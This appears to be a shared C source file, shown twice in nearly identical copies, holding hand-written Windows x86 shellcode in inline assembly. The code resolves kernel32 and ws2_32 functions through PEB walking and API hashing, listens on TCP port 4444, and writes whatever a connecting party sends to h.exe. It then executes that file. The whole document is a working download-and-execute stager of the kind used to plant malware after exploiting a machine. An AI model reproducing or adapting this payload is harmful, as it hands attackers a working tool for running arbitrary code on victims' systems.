wirepair · January 24, 2015 05:19
diff --git a/demo_scene_shellcode.c b/demo_scene_shellcode.c
 /* UNOPTIMIZED shellcode with horrible notes that probably don't make any sense because i've effed with the */
 /* code so much. I'll fix it in v2 :D */
 /* -wirepair & galt */

 #include <stdio.h>
 #include <winsock.h>

 #define my_hash(a,b)   __asm _emit a __asm _emit b 
 #define my_winst(a,b,c,d,e,f,g,h)	__asm _emit a __asm _emit b __asm _emit c __asm _emit d __asm _emit e __asm _emit f __asm _emit g __asm _emit h
 #define my_app(a,b,c,d,e,f)	__asm _emit a __asm _emit b __asm _emit c __asm _emit d __asm _emit e __asm _emit f



 #define hashtable 0     // address of our hashes. 
 #define base 4			// base of kernel32 then ws2_32 	
 #define func_string 8	// our current function string
 #define func_rva 12		// rva of functions for k32/ws2
 #define export 16		// export address 
 #define index 20		// index into hash table 
 #define functable 24	// where the functions for k32 are stored loadlib/createproc etc.
 #define ws2functable 52 // where the functions for ws2_32 are stored socket/bind etc.
 #define filehandle 72	// our file handle created by CreateFile
 #define sockethand 76	// our socket handle via socket()
 #define newsockhand 80	// our new socket via accept()
 #define recvdata 84		// where our data is stored
 #define recvdbytes 88	// &dwBytesWritten for WriteFile

 // offsets for func calls (+{functable || ws2functable}+ebp)
 #define loadlibrary 0	// ebp+functable+loadlibrary 28
 #define createproc 4	// ebp+functable+createproc 32
 #define createfile 8	// ebp+functable+createfile 36
 #define writefile 12	// ebp+functable+writefile 40
 #define closehandle 16	// ebp+functable+closehandle 44
 #define exitthread 20	// ebp+functable+exitthread 48

 #define socket 0		// ebp+ws2functable+socket
 #define bind 4			// ebp+ws2functable+bind
 #define listen 8		// ebp+ws2functable+listen
 #define accept 12		// ebp+ws2functable+accept
 #define recv 16			// ebp+ws2functable+recv

 int main(int argc, char **argv) {
 	//Testing Only
 	WSADATA wsa;
 	
 	WSAStartup(0x0101, &wsa);
 	// heh
 	
 	__asm {
 	startup:
 		sub esp, 0x100					// allocate 100h bytes
 		mov ebp, esp					// setup our base, this will be used through out the code 
 		call fwd						// call forward to get offset to data
 		inc ebx							// ebx points to start of hashes after these two inc's.
 		inc ebx							// move to start of hash table
 		mov [ebp+hashtable], ebx		// save offset of hash table
 	find_kern32:
 		xor eax, eax					// clear eax
 		mov eax, fs:[eax+0x30]			// find the peb 
 		mov eax, [eax+0x0c]				// exract pointer from peb
 		mov esi, [eax+0x1c]				// get flink
 		lodsd							// get blink
 		mov ebx, [eax + 0x8]			// base of kernel32
 		mov [ebp+base],ebx				// save kernel32 base
 		xor ecx, ecx
 		mov dword ptr [ebp+index], ecx	// zero out our index to hashes 0
 		call get_names_table			// get our names table
 		
 		
 		//call resolve_address			// resolve our func addresses and store them on the stack
 	load_ws2:
 		push 00003233h					// push "32" (still smaller than xor eax, eax: mov ax, 3233h: push eax) 
 		push 5f327377h					// push "ws2_"
 		mov ebx, esp					// offset of ws2_32
 		push ebx						// push the offset
 		call [ebp+functable+loadlibrary]// load ws2_32
 		pop ecx							// clear stack
 		pop ecx							// clear stack
 		mov ebx, eax					// base addr in ebx
 		mov [ebp+base],ebx				// clobber k32 base with ws2_32 base
 		add [ebp+index], 0x02			// increment the hash/string index
 		//inc edi
 		//inc edi
 		call get_names_table			// get the names table

 		/******************************************************************************/
 		// at this point all symbols have been resolved for kernel32.dll and ws2_32.dll!
 		// from here we need to do the following:
 		// CreateFile h.exe
 		// setup socket struct
 		// call socket
 		// call bind
 		// call listen
 		// setup si & pi 
 		// call accept
 		// loop recv & writefile
 		// once all data is recv'd call CloseHandle
 		// call CreateProcess!
 		//
 		/******************************************************************************/

 	create_file:
 		mov edi, [ebp+index]
 		xor ecx, ecx
 		push ecx						// push null template						 
 		mov dl, 0x80								 
 		push edx						// push file_attrib_normal
 		push 0x02						// push create always		
 		push ecx						// default sec
 		push ecx						// no share	
 		push 0xc0000000					// read / write sucks.. wish i could make this smaller
 		inc edi							// increment our index
 		inc edi							// increment our index
 		mov edx, [ebp+hashtable]		// move the hash table address into edx
 		add edx, edi					// add it with our index so we point to h.exe
 		push edx						// push offset to h.exe
 		add edi, 0x06					// move to beg of WinSta0
 		mov [ebp+index], edi			// and store it again
 		call [ebp+functable+createfile]	// create the bastich.
 		mov esi, eax					// move our handle into esi

 	setup_sock:			
 		push 0x00							// no flags
 		push 0x01							// SOCK_STREAM
 		push 0x02							// AF_INET
 		call [ebp+ws2functable+socket]		// call socket
 		mov edi, eax						// store socket in edi
 	setup_bind:
 		xor edx, edx
 		push edx
 		push edx							
 		push edx
 		push 0x5c110002						// struct sockaddr_in & htons(4444)
 		mov ebx, esp						// set ebx to struct
 		push 0x10							// push len of struct
 		push ebx							// push offset to struct
 		push edi							// push socket 
 		call [ebp+ws2functable+bind]		// call bind

 	setup_listen:
 		push 0x05							// backlog
 		push edi							// socket handle
 		call [ebp+ws2functable+listen]		// call listen	

 	setup_accept:
 		push edx							// push null
 		push edx							// push null
 		push edi							// push socket
 		call [ebp+ws2functable+accept]		// call accept
 		mov edi, eax						// new socket handle
 		mov [ebp+recvdbytes], 0x00			// set recv'd bytes to zero
 		
 	recv_func:
 		push 0x00							// push no flags
 		push 0x04							// push len
 		lea ecx, [ebp+recvdata]				// load the address of where we will save data
 		push ecx							// push it
 		push edi							// socket handle
 		call [ebp+ws2functable+recv]		// call recv
 		cmp eax, -1							// are we done? is there an error?
 		je close_hand						// if so close the handle and createproc

 	write_file:
 		push 0x00							// push null
 		lea ecx, [ebp+recvdbytes]
 		push ecx							// push location of bytes
 		push eax
 		lea ecx, [ebp+recvdata]				// push where we at.
 		push ecx							
 		push esi							// push file handle
 		call [ebp+functable+writefile]
 		jmp recv_func
 	
 	close_hand:
 		push esi								// push the file handle
 		call [ebp+functable+closehandle]		// close the handle

 	setup_structs:
 		xor ecx, ecx							// clear ecx
 		mov cl, 0x54							// set the size of our structs
 		sub esp, ecx							// make room on the stack for them
 		mov edi, esp							// set edi to the top of the stack
 		push edi								// push it for future ref
 		xor eax, eax							// clear eax
 		repe stosb								// repe stosb repeats moving 0x00 on the stack
 		pop edi									// pop back edi
 		mov byte ptr [edi], 0x44				// sizeof si
 		add edi, 0x08							// sub a few bytes away from 0x44 so we can set our si.lpDesktop
 		mov ebx, [ebp+index]					// incremement to h.exe
 		add ebx, [ebp+hashtable]				// offset to WinSta0\Default
 		mov [edi], ebx							// move it into the stack
 		sub edi, 0x08							// sub 8 to point back to h.exe

 	call_create:
 		lea esi, [edi+0x44]						
 		push esi								// pi
 		push edi								// si
 		push eax								// startup dir NULL
 		push eax								// env NULL
 		push eax								// creation NULL
 		push eax								// inherit NULL
 		push eax								// thread NULL
 		push eax								// process NULL
 		lea edi, [ebx-6]
 		push edi								// h.exe ptr 
 		push eax								// module name NULL
 		call [ebp+functable+createproc]			// run it!

 	exit_thread:
 		//push 0x00								// 
 		call [ebp+functable+exitthread]			// we are so done :D bye bye!

 	// get_names_table				//
 	// in: ebx = dll base address	//
 	
 	get_names_table:
 		mov eax, [ebx + 0x3c]			// pe header vma  
 		mov edi, [ebx + eax + 0x78]		// export table rva 0x7c800000 + e8 + 78 = (0x7c800160) Export Table Address (262c)
 		add edi, ebx					// export table VMA 0x7c80262c
 		mov eax, [edi + 0x20]			// names table relative offset = 2654
 		add eax, ebx					// names table VMA (0x7c802654) = a634 = names table 
 		mov [ebp+func_rva], eax			// store function rva
 		mov [ebp+export],edi			// store name table vma
 		mov esi, eax					// esi = pointer to func_rva
 		xor ecx, ecx					// clear ecx.
 		mov edi, [ebp+index]			// move index into edi

 	// Resolve Address:						//
 	// This function should have:			//
 	// in: ESI = pointer to func_rva		//
 	// out: functions stored in stack		//
 	// regs used: ecx, esi, eax, ebx, edx	//

 	resolve_address:
 		push ecx						// push our counter of functions
 		xor ecx, ecx
 		lodsd							// load into EAX rva of function names
 		add eax, [ebp+base]				// add rva to base to create vma

 	compute_hash:
 		movsx ebx, byte ptr [eax]		// move byte into ebx
 		test bl, bl						// does bl = 0?
 		jz compute_hash_done			// if so check if the hash matches our pre-computed hash
 		lea ecx, [ecx + ebx * 2]		// shift our sum and load into ecx 
 		xor ecx, 0x79					// xor our sum by 0x79
 		inc eax							// increment the character in the string
 		jmp compute_hash

 	compute_hash_done:
 		mov ebx, edi					// move our current index into ebx
 		add ebx, [ebp+hashtable]		// add the actual address of the hash with it and store in ebx
 		mov dx, word ptr [ebx]			// move the hash word into dx						
 		cmp dx, cx						// compare our computed hash with pre-computed hash
 		jz compute_hash_found			// did we find it?
 		pop ecx							// nope, pop our ecx value
 		inc ecx							// increment our function counter
 		jmp resolve_address
 	compute_hash_found:
 		pop ecx							// pop our ecx counter of funcs
 		mov esi, [ebp+base]				// move base into esi
 		mov eax, [ebp+export]			// load export table vma
 		mov edx, [eax+0x24]				// ordinals rva
 		add edx, esi					// vma
 		mov cx, [edx + 2 * ecx]			// extrapolate ordinal
 		mov ebx, [eax + 0x1c]			// relative offset
 		add ebx, esi					// vma
 		mov ebx, [ebx+ 4 * ecx]			// relative offset via ordinal
 		add ebx, esi					// function vma
 		lea ecx, [ebp+functable]		// find our base & add it
 		mov edx, edi					// figure out which hash & func we are on
 		shl edx, 0x01					// multiply by 2
 		add ecx, edx					// store it at the correct offset.
 		mov [ecx], ebx					// and store our function
 		mov ebx, edi					// load the index
 		add ebx, [ebp+hashtable]		// add it to 
 		mov dx, word ptr [ebx+2]		// check if next hash is null
 		test dx, dx						// test it for 0
 		jz compute_hash_fin				// we're done.
 		inc edi							// increment our hash value index
 		inc edi							// increment our hash value index
 		mov esi, [ebp+func_rva]			// we need to start from scratch again!
 		xor ecx, ecx					// zero it out so we can use it to store our computed hash
 		jmp resolve_address

 	compute_hash_fin:
 		inc edi
 		inc edi
 		mov [ebp+index], edi			// increment the hash/string index & move it back into index
 		ret								// return to caller
 	fwd:
 		call get_data					// this ret val gets popped
 	get_data:
 		pop ebx							// ptr to our data table
 		ret
 		/* kernel32.dll hash table */
 		my_hash(0xac,0x09)				// LoadLibraryA
 		my_hash(0xc8,0x0a)				// CreateProcessA
 		my_hash(0x83,0x08)				// CreateFileA
 		my_hash(0xdf,0x07)				// WriteFile
 		my_hash(0x0d,0x09)				// CloseHandle
 		my_hash(0x74,0x08)				// ExitThread //my_emit(0x6b,0x09) // ExitProcess
 		my_hash(0x00,0x00)				// we are at the end
 		/* ws2_32.dll hash table */
 		my_hash(0xd2,0x04)				// socket
 		my_hash(0x0a,0x03)				// bind
 		my_hash(0xfe,0x03)				// listen
 		my_hash(0xe0,0x05)				// accept
 		my_hash(0xf0,0x02)				// recv
 		my_hash(0x00,0x00)				// we are at the end
 		
 		/* application name h.exe */
 		my_app(0x68, 0x2e, 0x65, 0x78, 0x65, 0x00) // h.exe

 		/* Window Station String */
 		my_winst(0x57, 0x69, 0x6e, 0x53, 0x74, 0x61, 0x30, 0x5c) 
 		my_winst(0x44, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x00) // WinSta0\Default
 	}
 	return(0);
 }
	/* UNOPTIMIZED shellcode with horrible notes that probably don't make any sense because i've effed with the */
	/* code so much. I'll fix it in v2 :D */
	/* -wirepair & galt */

	#include <stdio.h>
	#include <winsock.h>

	#define my_hash(a,b) __asm _emit a __asm _emit b
	#define my_winst(a,b,c,d,e,f,g,h) __asm _emit a __asm _emit b __asm _emit c __asm _emit d __asm _emit e __asm _emit f __asm _emit g __asm _emit h
	#define my_app(a,b,c,d,e,f) __asm _emit a __asm _emit b __asm _emit c __asm _emit d __asm _emit e __asm _emit f



	#define hashtable 0 // address of our hashes.
	#define base 4 // base of kernel32 then ws2_32
	#define func_string 8 // our current function string
	#define func_rva 12 // rva of functions for k32/ws2
	#define export 16 // export address
	#define index 20 // index into hash table
	#define functable 24 // where the functions for k32 are stored loadlib/createproc etc.
	#define ws2functable 52 // where the functions for ws2_32 are stored socket/bind etc.
	#define filehandle 72 // our file handle created by CreateFile
	#define sockethand 76 // our socket handle via socket()
	#define newsockhand 80 // our new socket via accept()
	#define recvdata 84 // where our data is stored
	#define recvdbytes 88 // &dwBytesWritten for WriteFile

	// offsets for func calls (+{functable \|\| ws2functable}+ebp)
	#define loadlibrary 0 // ebp+functable+loadlibrary 28
	#define createproc 4 // ebp+functable+createproc 32
	#define createfile 8 // ebp+functable+createfile 36
	#define writefile 12 // ebp+functable+writefile 40
	#define closehandle 16 // ebp+functable+closehandle 44
	#define exitthread 20 // ebp+functable+exitthread 48

	#define socket 0 // ebp+ws2functable+socket
	#define bind 4 // ebp+ws2functable+bind
	#define listen 8 // ebp+ws2functable+listen
	#define accept 12 // ebp+ws2functable+accept
	#define recv 16 // ebp+ws2functable+recv

	int main(int argc, char **argv) {
	//Testing Only
	WSADATA wsa;

	WSAStartup(0x0101, &wsa);
	// heh

	__asm {
	startup:
	sub esp, 0x100 // allocate 100h bytes
	mov ebp, esp // setup our base, this will be used through out the code
	call fwd // call forward to get offset to data
	inc ebx // ebx points to start of hashes after these two inc's.
	inc ebx // move to start of hash table
	mov [ebp+hashtable], ebx // save offset of hash table
	find_kern32:
	xor eax, eax // clear eax
	mov eax, fs:[eax+0x30] // find the peb
	mov eax, [eax+0x0c] // exract pointer from peb
	mov esi, [eax+0x1c] // get flink
	lodsd // get blink
	mov ebx, [eax + 0x8] // base of kernel32
	mov [ebp+base],ebx // save kernel32 base
	xor ecx, ecx
	mov dword ptr [ebp+index], ecx // zero out our index to hashes 0
	call get_names_table // get our names table


	//call resolve_address // resolve our func addresses and store them on the stack
	load_ws2:
	push 00003233h // push "32" (still smaller than xor eax, eax: mov ax, 3233h: push eax)
	push 5f327377h // push "ws2_"
	mov ebx, esp // offset of ws2_32
	push ebx // push the offset
	call [ebp+functable+loadlibrary]// load ws2_32
	pop ecx // clear stack
	pop ecx // clear stack
	mov ebx, eax // base addr in ebx
	mov [ebp+base],ebx // clobber k32 base with ws2_32 base
	add [ebp+index], 0x02 // increment the hash/string index
	//inc edi
	//inc edi
	call get_names_table // get the names table

	/******************************************************************************/
	// at this point all symbols have been resolved for kernel32.dll and ws2_32.dll!
	// from here we need to do the following:
	// CreateFile h.exe
	// setup socket struct
	// call socket
	// call bind
	// call listen
	// setup si & pi
	// call accept
	// loop recv & writefile
	// once all data is recv'd call CloseHandle
	// call CreateProcess!
	//
	/******************************************************************************/

	create_file:
	mov edi, [ebp+index]
	xor ecx, ecx
	push ecx // push null template
	mov dl, 0x80
	push edx // push file_attrib_normal
	push 0x02 // push create always
	push ecx // default sec
	push ecx // no share
	push 0xc0000000 // read / write sucks.. wish i could make this smaller
	inc edi // increment our index
	inc edi // increment our index
	mov edx, [ebp+hashtable] // move the hash table address into edx
	add edx, edi // add it with our index so we point to h.exe
	push edx // push offset to h.exe
	add edi, 0x06 // move to beg of WinSta0
	mov [ebp+index], edi // and store it again
	call [ebp+functable+createfile] // create the bastich.
	mov esi, eax // move our handle into esi

	setup_sock:
	push 0x00 // no flags
	push 0x01 // SOCK_STREAM
	push 0x02 // AF_INET
	call [ebp+ws2functable+socket] // call socket
	mov edi, eax // store socket in edi
	setup_bind:
	xor edx, edx
	push edx
	push edx
	push edx
	push 0x5c110002 // struct sockaddr_in & htons(4444)
	mov ebx, esp // set ebx to struct
	push 0x10 // push len of struct
	push ebx // push offset to struct
	push edi // push socket
	call [ebp+ws2functable+bind] // call bind

	setup_listen:
	push 0x05 // backlog
	push edi // socket handle
	call [ebp+ws2functable+listen] // call listen

	setup_accept:
	push edx // push null
	push edx // push null
	push edi // push socket
	call [ebp+ws2functable+accept] // call accept
	mov edi, eax // new socket handle
	mov [ebp+recvdbytes], 0x00 // set recv'd bytes to zero

	recv_func:
	push 0x00 // push no flags
	push 0x04 // push len
	lea ecx, [ebp+recvdata] // load the address of where we will save data
	push ecx // push it
	push edi // socket handle
	call [ebp+ws2functable+recv] // call recv
	cmp eax, -1 // are we done? is there an error?
	je close_hand // if so close the handle and createproc

	write_file:
	push 0x00 // push null
	lea ecx, [ebp+recvdbytes]
	push ecx // push location of bytes
	push eax
	lea ecx, [ebp+recvdata] // push where we at.
	push ecx
	push esi // push file handle
	call [ebp+functable+writefile]
	jmp recv_func

	close_hand:
	push esi // push the file handle
	call [ebp+functable+closehandle] // close the handle

	setup_structs:
	xor ecx, ecx // clear ecx
	mov cl, 0x54 // set the size of our structs
	sub esp, ecx // make room on the stack for them
	mov edi, esp // set edi to the top of the stack
	push edi // push it for future ref
	xor eax, eax // clear eax
	repe stosb // repe stosb repeats moving 0x00 on the stack
	pop edi // pop back edi
	mov byte ptr [edi], 0x44 // sizeof si
	add edi, 0x08 // sub a few bytes away from 0x44 so we can set our si.lpDesktop
	mov ebx, [ebp+index] // incremement to h.exe
	add ebx, [ebp+hashtable] // offset to WinSta0\Default
	mov [edi], ebx // move it into the stack
	sub edi, 0x08 // sub 8 to point back to h.exe

	call_create:
	lea esi, [edi+0x44]
	push esi // pi
	push edi // si
	push eax // startup dir NULL
	push eax // env NULL
	push eax // creation NULL
	push eax // inherit NULL
	push eax // thread NULL
	push eax // process NULL
	lea edi, [ebx-6]
	push edi // h.exe ptr
	push eax // module name NULL
	call [ebp+functable+createproc] // run it!

	exit_thread:
	//push 0x00 //
	call [ebp+functable+exitthread] // we are so done :D bye bye!

	// get_names_table //
	// in: ebx = dll base address //

	get_names_table:
	mov eax, [ebx + 0x3c] // pe header vma
	mov edi, [ebx + eax + 0x78] // export table rva 0x7c800000 + e8 + 78 = (0x7c800160) Export Table Address (262c)
	add edi, ebx // export table VMA 0x7c80262c
	mov eax, [edi + 0x20] // names table relative offset = 2654
	add eax, ebx // names table VMA (0x7c802654) = a634 = names table
	mov [ebp+func_rva], eax // store function rva
	mov [ebp+export],edi // store name table vma
	mov esi, eax // esi = pointer to func_rva
	xor ecx, ecx // clear ecx.
	mov edi, [ebp+index] // move index into edi

	// Resolve Address: //
	// This function should have: //
	// in: ESI = pointer to func_rva //
	// out: functions stored in stack //
	// regs used: ecx, esi, eax, ebx, edx //

	resolve_address:
	push ecx // push our counter of functions
	xor ecx, ecx
	lodsd // load into EAX rva of function names
	add eax, [ebp+base] // add rva to base to create vma

	compute_hash:
	movsx ebx, byte ptr [eax] // move byte into ebx
	test bl, bl // does bl = 0?
	jz compute_hash_done // if so check if the hash matches our pre-computed hash
	lea ecx, [ecx + ebx * 2] // shift our sum and load into ecx
	xor ecx, 0x79 // xor our sum by 0x79
	inc eax // increment the character in the string
	jmp compute_hash

	compute_hash_done:
	mov ebx, edi // move our current index into ebx
	add ebx, [ebp+hashtable] // add the actual address of the hash with it and store in ebx
	mov dx, word ptr [ebx] // move the hash word into dx
	cmp dx, cx // compare our computed hash with pre-computed hash
	jz compute_hash_found // did we find it?
	pop ecx // nope, pop our ecx value
	inc ecx // increment our function counter
	jmp resolve_address
	compute_hash_found:
	pop ecx // pop our ecx counter of funcs
	mov esi, [ebp+base] // move base into esi
	mov eax, [ebp+export] // load export table vma
	mov edx, [eax+0x24] // ordinals rva
	add edx, esi // vma
	mov cx, [edx + 2 * ecx] // extrapolate ordinal
	mov ebx, [eax + 0x1c] // relative offset
	add ebx, esi // vma
	mov ebx, [ebx+ 4 * ecx] // relative offset via ordinal
	add ebx, esi // function vma
	lea ecx, [ebp+functable] // find our base & add it
	mov edx, edi // figure out which hash & func we are on
	shl edx, 0x01 // multiply by 2
	add ecx, edx // store it at the correct offset.
	mov [ecx], ebx // and store our function
	mov ebx, edi // load the index
	add ebx, [ebp+hashtable] // add it to
	mov dx, word ptr [ebx+2] // check if next hash is null
	test dx, dx // test it for 0
	jz compute_hash_fin // we're done.
	inc edi // increment our hash value index
	inc edi // increment our hash value index
	mov esi, [ebp+func_rva] // we need to start from scratch again!
	xor ecx, ecx // zero it out so we can use it to store our computed hash
	jmp resolve_address

	compute_hash_fin:
	inc edi
	inc edi
	mov [ebp+index], edi // increment the hash/string index & move it back into index
	ret // return to caller
	fwd:
	call get_data // this ret val gets popped
	get_data:
	pop ebx // ptr to our data table
	ret
	/* kernel32.dll hash table */
	my_hash(0xac,0x09) // LoadLibraryA
	my_hash(0xc8,0x0a) // CreateProcessA
	my_hash(0x83,0x08) // CreateFileA
	my_hash(0xdf,0x07) // WriteFile
	my_hash(0x0d,0x09) // CloseHandle
	my_hash(0x74,0x08) // ExitThread //my_emit(0x6b,0x09) // ExitProcess
	my_hash(0x00,0x00) // we are at the end
	/* ws2_32.dll hash table */
	my_hash(0xd2,0x04) // socket
	my_hash(0x0a,0x03) // bind
	my_hash(0xfe,0x03) // listen
	my_hash(0xe0,0x05) // accept
	my_hash(0xf0,0x02) // recv
	my_hash(0x00,0x00) // we are at the end

	/* application name h.exe */
	my_app(0x68, 0x2e, 0x65, 0x78, 0x65, 0x00) // h.exe

	/* Window Station String */
	my_winst(0x57, 0x69, 0x6e, 0x53, 0x74, 0x61, 0x30, 0x5c)
	my_winst(0x44, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x00) // WinSta0\Default
	}
	return(0);
	}